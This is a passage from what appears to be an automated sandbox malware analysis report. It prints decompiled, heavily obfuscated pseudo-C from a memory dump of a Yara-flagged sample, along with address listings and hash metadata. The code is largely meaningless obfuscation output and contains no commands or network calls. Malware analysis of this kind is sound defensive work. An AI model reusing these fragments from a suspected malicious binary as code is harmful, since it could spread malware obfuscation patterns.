				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                        0x00408c5b
                                                        0x00408c5f
                                                        0x00408c61
                                                        0x00408c61
                                                        0x00408c64
                                                        0x00408c86
                                                        0x00408cac
                                                        0x00408cd2
                                                        0x00408cf4
                                                        0x00408cfb
                                                        0x00408cfe
                                                        0x00408d01
                                                        0x00408d0a
                                                        0x00408d10
                                                        0x00408d17
                                                        0x00408d28
                                                        0x00408d2b
                                                        0x00408d2e
                                                        0x00408d32
                                                        0x00408d34
                                                        0x00408d36
                                                        0x00408d3f
                                                        0x00408d42
                                                        0x00408d45
                                                        0x00408d50
                                                        0x00408d56
                                                        0x00408d58
                                                        0x00408d58
                                                        0x00408d5b
                                                        0x00408d5e
                                                        0x00408d5e
                                                        0x00408d63
                                                        0x00408d65
                                                        0x00408d68
                                                        0x00408d6b
                                                        0x00408d71
                                                        0x00408d74
                                                        0x00408d77
                                                        0x00408d80
                                                        0x00408d86
                                                        0x00408d8f
                                                        0x00408d9e
                                                        0x00408da5
                                                        0x00408da8
                                                        0x00408dab
                                                        0x00408db4
                                                        0x00408db7
                                                        0x00408dba
                                                        0x00408dd2
                                                        0x00408dd9
                                                        0x00408ddb
                                                        0x00408dde
                                                        0x00408de1
                                                        0x00408dea
                                                        0x00408df1
                                                        0x00408df4
                                                        0x00408df7
                                                        0x00408e06
                                                        0x00408e0d
                                                        0x00408e10
                                                        0x00408e13
                                                        0x00408e1c
                                                        0x00408e26
                                                        0x00408e29
                                                        0x00408e35
                                                        0x00408e38
                                                        0x00408e3f
                                                        0x00408e42
                                                        0x00408e45
                                                        0x00408e4a
                                                        0x00408e4d
                                                        0x00408e56
                                                        0x00408e67
                                                        0x00408e6a
                                                        0x00408e6d
                                                        0x00408e74
                                                        0x00408e77
                                                        0x00408e7a
                                                        0x00408e7d
                                                        0x00408e7f
                                                        0x00408e82
                                                        0x00408e85
                                                        0x00408e8e
                                                        0x00408e93
                                                        0x00408e93
                                                        0x00408ea8
                                                        0x00408eab
                                                        0x00408eae
                                                        0x00408eb5
                                                        0x00408eb8
                                                        0x00408ebb
                                                        0x00408ed0
                                                        0x00408ed7
                                                        0x00408eda
                                                        0x00408ede
                                                        0x00408ee1
                                                        0x00408ee6
                                                        0x00408ee9
                                                        0x00408ef8
                                                        0x00408efb
                                                        0x00408f02
                                                        0x00408f05
                                                        0x00408f08
                                                        0x00408f0b
                                                        0x00408f0e
                                                        0x00408f16
                                                        0x00408f24
                                                        0x00408f27
                                                        0x00408f2a
                                                        0x00408f2a
                                                        0x00408f31
                                                        0x00408f34
                                                        0x00408f37
                                                        0x00408f3f
                                                        0x00408f4d
                                                        0x00408f50
                                                        0x00408f57
                                                        0x00408f5a
                                                        0x00408f5d
                                                        0x00408f60
                                                        0x00408f63
                                                        0x00408f6c
                                                        0x00408f73
                                                        0x00408f73
                                                        0x00408f79
                                                        0x00408f92
                                                        0x00408f95
                                                        0x00408f9c
                                                        0x00408f9f
                                                        0x00408fa2
                                                        0x00408fb4
                                                        0x00408fbe
                                                        0x00408fc1
                                                        0x00408fca
                                                        0x00408fcd
                                                        0x00408fd4
                                                        0x00408fd7
                                                        0x00408fdd
                                                        0x00408ff0
                                                        0x00408ff7
                                                        0x00408ffa
                                                        0x00408ffd
                                                        0x00409000
                                                        0x00409009
                                                        0x0040900c
                                                        0x0040901f
                                                        0x00409022
                                                        0x0040902c
                                                        0x0040902f
                                                        0x00409031
                                                        0x0040903a
                                                        0x0040903d
                                                        0x00409050
                                                        0x00409056
                                                        0x00409059
                                                        0x00409060
                                                        0x00409062
                                                        0x00409065
                                                        0x00409068
                                                        0x0040906b
                                                        0x0040906e
                                                        0x00409071
                                                        0x0040907a
                                                        0x0040907f
                                                        0x00409082
                                                        0x00409082
                                                        0x00409095
                                                        0x00409098
                                                        0x0040909b
                                                        0x004090a2
                                                        0x004090a5
                                                        0x004090a8
                                                        0x004090ab
                                                        0x004090be
                                                        0x004090c1
                                                        0x004090cc
                                                        0x004090cf
                                                        0x004090db
                                                        0x004090de
                                                        0x004090e4
                                                        0x004090e7
                                                        0x004090ea
                                                        0x004090f1
                                                        0x00409101
                                                        0x00409104
                                                        0x0040910a
                                                        0x0040910d
                                                        0x00409114
                                                        0x00409116
                                                        0x00409119
                                                        0x0040911c
                                                        0x0040911f
                                                        0x00409122
                                                        0x00409129
                                                        0x00409138
                                                        0x0040913b
                                                        0x00409142
                                                        0x00409145
                                                        0x00409148
                                                        0x0040914b
                                                        0x0040914e
                                                        0x00409151
                                                        0x00409154
                                                        0x0040915d
                                                        0x0040916e
                                                        0x00409176
                                                        0x0040917c
                                                        0x0040917f
                                                        0x00409181
                                                        0x00409184
                                                        0x00409187
                                                        0x00409194

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
                                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                        • Instruction ID: 8ad233646052dc3e62b8ed2cbc52c1af8ad6dc8a0ae32faa969373aa01f020fc
                                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                        • Instruction Fuzzy Hash: 85021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041BAC8, Relevance: .3, Instructions: 320COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E0041BAC8(signed int __eax, signed int __ebx, signed char __ecx, void* __edx, signed int __edi, signed int __esi) {
				signed int _t51;
				signed int _t61;
				signed int _t66;
				signed char _t67;
				signed char _t69;
				intOrPtr _t75;
				signed char _t78;
				signed char _t79;
				signed int _t85;
				signed int _t91;
				signed int _t95;
				signed int _t96;
				signed int _t99;
				signed int _t100;
				signed int _t107;
				signed int _t116;
				void* _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr _t137;

				_t100 = __esi;
				_t96 = __edi;
				_t69 = __ecx;
				_t61 = __ebx;
				_t51 = __eax;
				 *0x8dbdb608 =  *0x8dbdb608 - __ecx;
				asm("sbb edx, 0x471191e");
				asm("adc esp, 0xe4d2b611");
				_t85 = __edx +  *0x8fd98e9 & 0x000000e6;
				asm("adc esi, 0x1bfe81fe");
				if(( *0xf5bfd82f & __esi) == 0) {
					 *0x4e9e1475 =  *0x4e9e1475 >> 0xa7;
					asm("sbb bh, 0xe0");
					asm("rcl dword [0xc9137a1d], 0x34");
					 *0x9c6a1bf2 =  *0x9c6a1bf2 << 0xfa;
					__cl = __cl &  *0x820cc0e2;
					_push( *0xb7831292);
					return __eax;
				}
				L1:
				asm("adc [0xa1201009], eax");
				asm("lodsb");
				asm("adc esi, [0x41fcfdee]");
				 *0x2966e1a0 =  *0x2966e1a0 >> 0xfc;
				asm("rol dword [0x60b61e96], 0x63");
				_t51 = _t51 + 0x63;
				_t100 = _t100 -  *0xddfd293;
				asm("sbb eax, [0xc377e319]");
				_t61 = (_t61 + 0x00000001 &  *0x8e8886d) + 1;
				asm("movsw");
				asm("adc edi, 0xb04da4b8");
				_pop(_t96);
				_t69 = _t69 -  *0xe83f0504 |  *0x96ee906c;
				_push(_t96);
				 *0xd0ce8b85 =  *0xd0ce8b85 >> 0x14;
				 *0x52211e10 =  *0x52211e10 + _t61;
				_t120 = (_t120 |  *0x100c626d) - 1;
				_t107 = 0x602580cb |  *0x546e2e31;
				asm("adc cl, [0x22c6a80a]");
				_t85 = _t85 + 0x00000001 ^ 0x689e1362 | 0x09fb999c;
				 *0x5c780ce6 =  *0x5c780ce6 >> 0x8f;
				if( *0x5c780ce6 >= 0) {
					_pop( *0x28ccce70);
					_t120 = _t120 +  *0x3430581;
					asm("stosd");
					_push( *0x1cef0afb);
					 *0x5fd7d6b2 =  *0x5fd7d6b2 & _t85;
					_t107 =  *0xe3e2139 ^  *0x4babdf0f;
					 *0x863362d5 =  *0x863362d5 >> 0x4d;
					 *0xbe3382ce =  *0xbe3382ce + _t61;
					_t96 = _t96 ^ 0x726a071e;
					asm("stosd");
					asm("rcl dword [0x2a6b2b1d], 0x39");
					 *0xefd7bf3c =  *0xefd7bf3c >> 7;
					 *0x86eb06a2 =  *0x86eb06a2 | _t85;
					 *0xa87013d3 =  *0xa87013d3 << 0x3e;
					_t69 =  *0x5103cce3;
					 *0x5103cce3 = (0xfb627fd6 |  *0x4ac6be16) - 0xe5;
					asm("adc esi, 0x991d8fec");
					asm("sbb esp, [0xfe80e711]");
					_t61 = _t61 -  *0xc90fefcb ^  *0x6335c8f7;
					 *0x2418b3b =  *0x2418b3b ^ _t51;
					asm("adc bl, 0xe1");
					if( *0x2418b3b > 0) {
						asm("sbb eax, [0x3bc21576]");
						_t61 = (_t61 & 0x000000b4) - 0x62266691;
						_t85 = _t85 -  *0xc2299e29;
						 *0x5457e8b7 =  *0x5457e8b7 - _t69;
						_t137 =  *0x5457e8b7;
						if(_t137 <= 0) {
							asm("adc esp, [0xfd9c7577]");
							_push( *0x26daa109);
							if(_t137 >= 0) {
								_t69 =  *0x7252dc7c * 0x4e84;
								if(_t69 == 0) {
									 *0xbe597375 = _t69;
									asm("lodsd");
									 *0xb34e9004 =  *0xb34e9004 << 0x37;
									_pop(_t75);
									 *0x86f2bb0a =  *0x86f2bb0a >> 0x95;
									 *0x5b854ad3 =  *0x5b854ad3 | _t51;
									_t107 = _t107 + 0x176c8cfe |  *0x6d7c473d;
									asm("ror byte [0x1712b5e4], 0x23");
									asm("sbb ah, 0x86");
									_t51 = _t51 |  *0x2c7e2e16;
									_pop(_t99);
									_t100 =  *0xd9047360 * 0x8540;
									_t69 =  *0x6d7536c9;
									 *0x6d7536c9 = _t75;
									_t85 =  *0x16e93069 * 0x7daf;
									_t96 = _t99 |  *0x3d23f50b;
									_t120 = _t120 |  *0x191be4f4;
									_t61 = _t61 -  *0xed22ebe0;
									asm("sbb ebp, 0x9c58a56d");
									if(_t61 < 0) {
										asm("adc esi, [0xec973479]");
										 *0xb0ae5d39 =  *0xb0ae5d39 - _t120;
										 *0x20edfae3 =  *0x20edfae3 + _t61;
										asm("sbb [0x9bb3b1b7], cl");
										 *0x50983c9 =  *0x50983c9 >> 0x82;
										_t116 = _t107 | 0x1c1afb96;
										asm("cmpsb");
										 *0x480b8167 =  *0x480b8167 | _t69 ^ 0x00000000;
										 *0xb336e120 =  *0xb336e120 | _t51;
										asm("adc esi, [0xabc3d18f]");
										asm("adc esp, [0x290bfdd5]");
										 *0xa6eb8bde =  *0xa6eb8bde << 0xde;
										_t100 = _t100 -  *0xabc2d281;
										asm("rcr dword [0x230efdd5], 0xdd");
										 *0x16a30e31 =  *0x16a30e31 ^ _t116;
										_t96 = _t96 + 1;
										 *0xb6243188 =  *0xb6243188 >> 0x6c;
										asm("rcl byte [0x33aef908], 0x68");
										 *0x5f8b9937 =  *0x5f8b9937 ^ _t85;
										asm("sbb dl, 0x34");
										 *0x2c5e4014 =  *0x2c5e4014 << 0x3f;
										asm("adc dh, 0x12");
										_t61 = _t61 &  *0x8c59df12;
										 *0xdd22dc86 =  *0xdd22dc86 ^ _t61;
										_t69 =  *0x2b2c9acf;
										asm("rol byte [0xbda624f2], 0xd6");
										asm("rcr dword [0xa3ea121d], 0x97");
										_t107 = _t116 - 1;
										_t85 = _t85 - 0x00000001 ^ 0x9ea3db3d;
										_t51 = (_t51 ^ 0x0000000a) +  *0xd1d4bca;
										asm("sbb eax, [0x73e36f0d]");
										asm("adc esi, 0xa4a34cc0");
										if(_t51 < 0) {
											asm("adc edi, [0x4a861273]");
											_t61 = _t61 ^ 0xa3b931cb;
											 *0x64814b10 =  *0x64814b10 - _t85;
											_t107 = _t107 &  *0xf307548e;
											_t21 = _t51;
											_t51 =  *0x7f3777a0;
											 *0x7f3777a0 = _t21;
											_pop(_t120);
											asm("rcr byte [0xddb5091a], 0xf7");
											 *0x32130a81 =  *0x32130a81 ^ _t61;
											_push(_t85);
											 *0xd58dad29 =  *0xd58dad29 << 0x12;
											_t69 = _t69 | 0x000000c9;
											 *0x8b17fbd3 =  *0x8b17fbd3 ^ _t120;
											_t100 = 0x3ca9198c +  *0x78c8c6b * 0x6a2d;
											_t85 = _t85 |  *0xcc18940d;
											if(_t85 == 0) {
												_t78 = _t69 + 1;
												 *0xbeb4ecd9 =  *0xbeb4ecd9 | _t78;
												 *0xbadafdf1 =  *0xbadafdf1 - 0x1fa92a7b;
												asm("stosd");
												asm("adc eax, [0x6dfe923d]");
												_t79 = _t78 ^ 0x00000022;
												asm("sbb ebx, [0x6b290011]");
												_t66 = _t61 +  *0x12839d1b;
												asm("stosd");
												_push(_t120);
												 *0x87312133 =  *0x87312133 + _t79;
												asm("adc [0x2b898fd5], esp");
												_push(_t66);
												 *0xb5bbdf0 =  *0xb5bbdf0 << 0xab;
												asm("sbb [0x5d343a3a], cl");
												 *0xcbecf632 =  *0xcbecf632 >> 0x65;
												 *0x2200f0c2 = 0x1fa92a7b;
												asm("rol byte [0x807a8838], 0x94");
												 *0x4b465516 =  *0x4b465516 << 0x4f;
												L1();
												_t91 =  *0x72eba03a;
												 *0x72eba03a =  *0xa7973af6;
												asm("sbb [0x336c880], bl");
												 *0xfd16fad2 =  *0xfd16fad2 + _t91;
												asm("sbb ebp, [0x654c663d]");
												_t69 = _t79 +  *0x6e788fec +  *0xe2732ccf - 1;
												 *0xbf02c004 =  *0xbf02c004 >> 0x47;
												asm("adc bh, [0xef8be9e3]");
												 *0x7192db2c =  *0x7192db2c << 0x48;
												_t118 = _t66;
												_t67 = _t66 ^  *0x7c1bd46c;
												_t120 = _t120 -  *0x6da73287 -  *0x64cda393;
												asm("adc ch, 0xe4");
												asm("sbb ecx, [0x11a8c467]");
												asm("adc [0xb11a7100], cl");
												 *0xe7269de1 =  *0xe7269de1 ^ _t67;
												_t29 = _t100 +  *0xa03fbd2f &  *0x523d0003;
												_t100 =  *0x79da4885;
												 *0x79da4885 = _t29;
												asm("rol dword [0x80276d9], 0xda");
												asm("rcr byte [0xeca4ffe0], 0x14");
												_push(_t118);
												_t119 = _t118 - 0xafb167eb;
												 *0x437ef68c =  *0x437ef68c << 0x98;
												_push(_t96);
												 *0x9817efb =  *0x9817efb >> 0x55;
												 *0x224475f8 =  *0xbe3eb26b * 0xc0d6;
												_push(_t119);
												_t61 = _t67 - 0xf9 -  *0x996081d2;
												asm("adc edi, [0x99053409]");
												_t107 = _t119 &  *0xdfdf02cc;
												 *0x19eed505 =  *0x19eed505 | 0x1fa92a7b;
												 *0xd505dfe7 = _t69;
												_t85 = _t91 ^  *0xbff0400b |  *0xdff43102;
												 *0x77c5b905 =  *0x77c5b905 << 0x2d;
												_t51 =  *0x224475f8 |  *0xad05dfe0;
												 *0xdfde73ba =  *0xdfde73ba << 6;
												 *0xac03dfee =  *0xac03dfee ^ _t51;
												if( *0x9a044024 > _t61) {
													asm("sbb esi, 0x444b1bb");
													 *0x44abc90c =  *0x44abc90c << 0x6f;
													_t120 = _t120 + 1;
													 *0xe605dffa =  *0xe605dffa | _t120;
													asm("adc bl, 0x32");
													_t100 = _t100 +  *0xf232082f;
													asm("adc ecx, [0x42e007df]");
													asm("sbb ebx, [0x5e711207]");
													 *0x1a45376f = 0x1fa92a7b;
													 *0x15d92807 =  *0x15d92807 & 0x1fa92a7b;
													_t49 = _t51 +  *0xa9c87704 - 1 +  *0x1a47426c;
													_t51 =  *0x81a5308;
													 *0x81a5308 = _t49;
													_t69 = 0xc;
													_push(0xc);
													_push(_t100);
													 *0xdb5e9cde =  *0xdb5e9cde + _t51;
													asm("sbb ebp, [0x4854868]");
													_t61 = _t61 ^  *0x414b008;
													asm("adc ah, [0x7017161a]");
													asm("sbb [0xd40e0804], dh");
													_t107 =  *0x3454c966;
													if(_t61 < 0) {
														asm("sbb eax, [0x51090479]");
														 *0xc12f572a =  *0xc12f572a >> 0xdf;
														asm("lodsd");
														asm("rol byte [0x816a24e5], 0x26");
														_t95 =  *0x3aca5609;
														_t61 =  *0x7941f960 * 0xa81;
														asm("adc bh, 0xca");
														asm("adc dl, 0xf2");
														_t85 = _t95 |  *0xad1c282d;
														asm("sbb ebx, [0xfbdaf411]");
														_pop( *0x458fc10b);
														asm("lodsd");
														 *0x9569553b =  *0x9569553b ^ _t96;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}























                                                        0x0041bac8
                                                        0x0041bac8
                                                        0x0041bac8
                                                        0x0041bac8
                                                        0x0041bac8
                                                        0x0041bace
                                                        0x0041bad4
                                                        0x0041bada
                                                        0x0041bae6
                                                        0x0041baef
                                                        0x0041baf5
                                                        0x0041bafb
                                                        0x0041bb08
                                                        0x0041bb0b
                                                        0x0041bb12
                                                        0x0041bb19
                                                        0x0041bb1f
                                                        0x0041bb25
                                                        0x0041bb25
                                                        0x0041b496
                                                        0x0041b496
                                                        0x0041b4af
                                                        0x0041b4b0
                                                        0x0041b4bc
                                                        0x0041b4d1
                                                        0x0041b4d8
                                                        0x0041b4e1
                                                        0x0041b4e8
                                                        0x0041b4ee
                                                        0x0041b4ef
                                                        0x0041b4f1
                                                        0x0041b4f7
                                                        0x0041b504
                                                        0x0041b50a
                                                        0x0041b50b
                                                        0x0041b518
                                                        0x0041b52a
                                                        0x0041b52b
                                                        0x0041b531
                                                        0x0041b53d
                                                        0x0041b543
                                                        0x0041b54a
                                                        0x0041b550
                                                        0x0041b556
                                                        0x0041b562
                                                        0x0041b56f
                                                        0x0041b575
                                                        0x0041b581
                                                        0x0041b587
                                                        0x0041b58e
                                                        0x0041b5a3
                                                        0x0041b5af
                                                        0x0041b5b6
                                                        0x0041b5c0
                                                        0x0041b5c7
                                                        0x0041b5cd
                                                        0x0041b5d4
                                                        0x0041b5d4
                                                        0x0041b5da
                                                        0x0041b5e0
                                                        0x0041b5e6
                                                        0x0041b5ec
                                                        0x0041b5f2
                                                        0x0041b5f5
                                                        0x0041b5fb
                                                        0x0041b604
                                                        0x0041b60a
                                                        0x0041b610
                                                        0x0041b610
                                                        0x0041b616
                                                        0x0041b61c
                                                        0x0041b622
                                                        0x0041b628
                                                        0x0041b62e
                                                        0x0041b638
                                                        0x0041b63e
                                                        0x0041b651
                                                        0x0041b658
                                                        0x0041b665
                                                        0x0041b666
                                                        0x0041b66d
                                                        0x0041b673
                                                        0x0041b679
                                                        0x0041b690
                                                        0x0041b693
                                                        0x0041b699
                                                        0x0041b69a
                                                        0x0041b6a4
                                                        0x0041b6a4
                                                        0x0041b6aa
                                                        0x0041b6b4
                                                        0x0041b6ba
                                                        0x0041b6c0
                                                        0x0041b6c6
                                                        0x0041b6cc
                                                        0x0041b6d2
                                                        0x0041b6d8
                                                        0x0041b6de
                                                        0x0041b6e4
                                                        0x0041b6ea
                                                        0x0041b6f1
                                                        0x0041b6f7
                                                        0x0041b6fb
                                                        0x0041b701
                                                        0x0041b707
                                                        0x0041b70d
                                                        0x0041b713
                                                        0x0041b71a
                                                        0x0041b720
                                                        0x0041b72a
                                                        0x0041b730
                                                        0x0041b731
                                                        0x0041b73e
                                                        0x0041b745
                                                        0x0041b74b
                                                        0x0041b74e
                                                        0x0041b755
                                                        0x0041b758
                                                        0x0041b75e
                                                        0x0041b764
                                                        0x0041b76a
                                                        0x0041b772
                                                        0x0041b779
                                                        0x0041b780
                                                        0x0041b78c
                                                        0x0041b792
                                                        0x0041b798
                                                        0x0041b79e
                                                        0x0041b7a4
                                                        0x0041b7b0
                                                        0x0041b7b6
                                                        0x0041b7c2
                                                        0x0041b7c8
                                                        0x0041b7c8
                                                        0x0041b7c8
                                                        0x0041b7ce
                                                        0x0041b7cf
                                                        0x0041b7e0
                                                        0x0041b7e6
                                                        0x0041b7e7
                                                        0x0041b7ee
                                                        0x0041b7f1
                                                        0x0041b7f7
                                                        0x0041b7fd
                                                        0x0041b803
                                                        0x0041b80e
                                                        0x0041b821
                                                        0x0041b827
                                                        0x0041b82d
                                                        0x0041b834
                                                        0x0041b83a
                                                        0x0041b83d
                                                        0x0041b843
                                                        0x0041b849
                                                        0x0041b84a
                                                        0x0041b84b
                                                        0x0041b851
                                                        0x0041b857
                                                        0x0041b858
                                                        0x0041b865
                                                        0x0041b86b
                                                        0x0041b878
                                                        0x0041b87e
                                                        0x0041b88b
                                                        0x0041b899
                                                        0x0041b8a4
                                                        0x0041b8a4
                                                        0x0041b8ab
                                                        0x0041b8b1
                                                        0x0041b8b7
                                                        0x0041b8ce
                                                        0x0041b8cf
                                                        0x0041b8d6
                                                        0x0041b8dc
                                                        0x0041b8e3
                                                        0x0041b8e4
                                                        0x0041b8f3
                                                        0x0041b8f9
                                                        0x0041b8fc
                                                        0x0041b908
                                                        0x0041b90e
                                                        0x0041b914
                                                        0x0041b914
                                                        0x0041b914
                                                        0x0041b92a
                                                        0x0041b93a
                                                        0x0041b947
                                                        0x0041b948
                                                        0x0041b94e
                                                        0x0041b955
                                                        0x0041b956
                                                        0x0041b95d
                                                        0x0041b97e
                                                        0x0041b97f
                                                        0x0041b985
                                                        0x0041b98b
                                                        0x0041b991
                                                        0x0041b997
                                                        0x0041b99d
                                                        0x0041b9a3
                                                        0x0041b9aa
                                                        0x0041b9b0
                                                        0x0041b9bd
                                                        0x0041b9c9
                                                        0x0041b9d6
                                                        0x0041b9dc
                                                        0x0041b9e9
                                                        0x0041b9f0
                                                        0x0041b9f6
                                                        0x0041b9ff
                                                        0x0041ba05
                                                        0x0041ba12
                                                        0x0041ba18
                                                        0x0041ba2a
                                                        0x0041ba33
                                                        0x0041ba33
                                                        0x0041ba33
                                                        0x0041ba3a
                                                        0x0041ba3c
                                                        0x0041ba3d
                                                        0x0041ba47
                                                        0x0041ba4d
                                                        0x0041ba53
                                                        0x0041ba59
                                                        0x0041ba5f
                                                        0x0041ba65
                                                        0x0041ba6b
                                                        0x0041ba71
                                                        0x0041ba77
                                                        0x0041ba7e
                                                        0x0041ba8c
                                                        0x0041ba99
                                                        0x0041ba9a
                                                        0x0041baa4
                                                        0x0041baa7
                                                        0x0041baaa
                                                        0x0041bab0
                                                        0x0041bab6
                                                        0x0041babc
                                                        0x0041babd
                                                        0x0041babd
                                                        0x0041ba6b
                                                        0x0041b9c9
                                                        0x0041b803
                                                        0x0041b79e
                                                        0x0041b6cc
                                                        0x0041b638
                                                        0x0041b628
                                                        0x0041b616
                                                        0x0041b5f5
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01de07ce54c1b7beb121700faabd11d2be45695bf5f03f837367b54838f42005
                                                        • Instruction ID: 5eeb1eda9e8173a4ad670a95ea73b2c66fbf6066233fa1a2c4831be2ecd048ba
                                                        • Opcode Fuzzy Hash: 01de07ce54c1b7beb121700faabd11d2be45695bf5f03f837367b54838f42005
                                                        • Instruction Fuzzy Hash: CEF196329083C5CFE706DF38D89AB823FB5F346320B08829ED9A1535D6D3792569DB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041C089, Relevance: .3, Instructions: 314COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E0041C089(void* __eax, signed int __ebx, signed char __ecx, signed int __edx) {
				signed int _t47;
				signed int _t57;
				signed int _t62;
				signed char _t63;
				signed char _t65;
				intOrPtr _t71;
				signed char _t74;
				signed char _t75;
				signed int _t79;
				signed int _t85;
				signed int _t89;
				signed int _t90;
				signed int _t93;
				signed int _t94;
				signed int _t101;
				signed int _t110;
				void* _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t130;

				_t79 = __edx;
				_t65 = __ecx;
				_t57 = __ebx;
				_t47 = __eax + 0x135496e9;
				if(_t47 != 0) {
					__ebp = __ebp +  *0x7bfe4974;
					__ebx = __ebx -  *0x79327bb;
					asm("stosb");
					__ebx = __ebx - 1;
					 *0xd3d0bcc4 =  *0xd3d0bcc4 | __edx;
					_pop(__edx);
					__ecx = __ecx &  *0x3beca098;
					asm("sbb eax, [0x2dc37a16]");
					return __eax;
				}
				L1:
				asm("adc [0xa1201009], eax");
				asm("lodsb");
				asm("adc esi, [0x41fcfdee]");
				 *0x2966e1a0 =  *0x2966e1a0 >> 0xfc;
				asm("rol dword [0x60b61e96], 0x63");
				_t47 = _t47 + 0x63;
				_t94 = _t94 -  *0xddfd293;
				asm("sbb eax, [0xc377e319]");
				_t57 = (_t57 + 0x00000001 &  *0x8e8886d) + 1;
				asm("movsw");
				asm("adc edi, 0xb04da4b8");
				_pop(_t90);
				_t65 = _t65 -  *0xe83f0504 |  *0x96ee906c;
				_push(_t90);
				 *0xd0ce8b85 =  *0xd0ce8b85 >> 0x14;
				 *0x52211e10 =  *0x52211e10 + _t57;
				_t114 = (_t114 |  *0x100c626d) - 1;
				_t101 = 0x602580cb |  *0x546e2e31;
				asm("adc cl, [0x22c6a80a]");
				_t79 = _t79 + 0x00000001 ^ 0x689e1362 | 0x09fb999c;
				 *0x5c780ce6 =  *0x5c780ce6 >> 0x8f;
				if( *0x5c780ce6 >= 0) {
					_pop( *0x28ccce70);
					_t114 = _t114 +  *0x3430581;
					asm("stosd");
					_push( *0x1cef0afb);
					 *0x5fd7d6b2 =  *0x5fd7d6b2 & _t79;
					_t101 =  *0xe3e2139 ^  *0x4babdf0f;
					 *0x863362d5 =  *0x863362d5 >> 0x4d;
					 *0xbe3382ce =  *0xbe3382ce + _t57;
					_t90 = _t90 ^ 0x726a071e;
					asm("stosd");
					asm("rcl dword [0x2a6b2b1d], 0x39");
					 *0xefd7bf3c =  *0xefd7bf3c >> 7;
					 *0x86eb06a2 =  *0x86eb06a2 | _t79;
					 *0xa87013d3 =  *0xa87013d3 << 0x3e;
					_t65 =  *0x5103cce3;
					 *0x5103cce3 = (0xfb627fd6 |  *0x4ac6be16) - 0xe5;
					asm("adc esi, 0x991d8fec");
					asm("sbb esp, [0xfe80e711]");
					_t57 = _t57 -  *0xc90fefcb ^  *0x6335c8f7;
					 *0x2418b3b =  *0x2418b3b ^ _t47;
					asm("adc bl, 0xe1");
					if( *0x2418b3b > 0) {
						asm("sbb eax, [0x3bc21576]");
						_t57 = (_t57 & 0x000000b4) - 0x62266691;
						_t79 = _t79 -  *0xc2299e29;
						 *0x5457e8b7 =  *0x5457e8b7 - _t65;
						_t130 =  *0x5457e8b7;
						if(_t130 <= 0) {
							asm("adc esp, [0xfd9c7577]");
							_push( *0x26daa109);
							if(_t130 >= 0) {
								_t65 =  *0x7252dc7c * 0x4e84;
								if(_t65 == 0) {
									 *0xbe597375 = _t65;
									asm("lodsd");
									 *0xb34e9004 =  *0xb34e9004 << 0x37;
									_pop(_t71);
									 *0x86f2bb0a =  *0x86f2bb0a >> 0x95;
									 *0x5b854ad3 =  *0x5b854ad3 | _t47;
									_t101 = _t101 + 0x176c8cfe |  *0x6d7c473d;
									asm("ror byte [0x1712b5e4], 0x23");
									asm("sbb ah, 0x86");
									_t47 = _t47 |  *0x2c7e2e16;
									_pop(_t93);
									_t94 =  *0xd9047360 * 0x8540;
									_t65 =  *0x6d7536c9;
									 *0x6d7536c9 = _t71;
									_t79 =  *0x16e93069 * 0x7daf;
									_t90 = _t93 |  *0x3d23f50b;
									_t114 = _t114 |  *0x191be4f4;
									_t57 = _t57 -  *0xed22ebe0;
									asm("sbb ebp, 0x9c58a56d");
									if(_t57 < 0) {
										asm("adc esi, [0xec973479]");
										 *0xb0ae5d39 =  *0xb0ae5d39 - _t114;
										 *0x20edfae3 =  *0x20edfae3 + _t57;
										asm("sbb [0x9bb3b1b7], cl");
										 *0x50983c9 =  *0x50983c9 >> 0x82;
										_t110 = _t101 | 0x1c1afb96;
										asm("cmpsb");
										 *0x480b8167 =  *0x480b8167 | _t65 ^ 0x00000000;
										 *0xb336e120 =  *0xb336e120 | _t47;
										asm("adc esi, [0xabc3d18f]");
										asm("adc esp, [0x290bfdd5]");
										 *0xa6eb8bde =  *0xa6eb8bde << 0xde;
										_t94 = _t94 -  *0xabc2d281;
										asm("rcr dword [0x230efdd5], 0xdd");
										 *0x16a30e31 =  *0x16a30e31 ^ _t110;
										_t90 = _t90 + 1;
										 *0xb6243188 =  *0xb6243188 >> 0x6c;
										asm("rcl byte [0x33aef908], 0x68");
										 *0x5f8b9937 =  *0x5f8b9937 ^ _t79;
										asm("sbb dl, 0x34");
										 *0x2c5e4014 =  *0x2c5e4014 << 0x3f;
										asm("adc dh, 0x12");
										_t57 = _t57 &  *0x8c59df12;
										 *0xdd22dc86 =  *0xdd22dc86 ^ _t57;
										_t65 =  *0x2b2c9acf;
										asm("rol byte [0xbda624f2], 0xd6");
										asm("rcr dword [0xa3ea121d], 0x97");
										_t101 = _t110 - 1;
										_t79 = _t79 - 0x00000001 ^ 0x9ea3db3d;
										_t47 = (_t47 ^ 0x0000000a) +  *0xd1d4bca;
										asm("sbb eax, [0x73e36f0d]");
										asm("adc esi, 0xa4a34cc0");
										if(_t47 < 0) {
											asm("adc edi, [0x4a861273]");
											_t57 = _t57 ^ 0xa3b931cb;
											 *0x64814b10 =  *0x64814b10 - _t79;
											_t101 = _t101 &  *0xf307548e;
											_t17 = _t47;
											_t47 =  *0x7f3777a0;
											 *0x7f3777a0 = _t17;
